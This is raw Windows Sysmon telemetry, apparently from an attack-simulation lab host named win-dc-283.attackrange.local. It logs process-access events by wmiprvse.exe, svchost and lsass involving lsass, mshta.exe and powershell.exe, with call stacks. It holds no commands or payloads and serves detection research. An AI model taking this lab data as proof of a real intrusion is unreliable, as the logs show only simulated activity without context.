15:59:44.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027571Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027570Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027569Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027568Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027567Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027566Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027565Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027564Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027563Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027562Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027561Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027560Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027559Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027558Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.678{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027773Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.241{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5371-6008-7B06-00000000A301}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027772Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.241{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5371-6008-7B06-00000000A301}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027771Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.209{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5371-6008-7B06-00000000A301}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027770Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.209{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5371-6008-7B06-00000000A301}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000027769Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.162{7901BC46-5371-6008-7B06-00000000A301}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ui11eupq.gio.ps12021-01-20 15:59:45.162 10341000x800000000000000027768Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.147{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5371-6008-7B06-00000000A301}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027767Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.116{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5371-6008-7C06-00000000A301}5872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027766Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.116{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5371-6008-7C06-00000000A301}5872C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027765Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.116{7901BC46-5371-6008-7C06-00000000A301}58722948C:\Windows\system32\conhost.exe{7901BC46-5371-6008-7B06-00000000A301}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027764Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.100{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5371-6008-7C06-00000000A301}5872C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027763Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.100{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027762Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 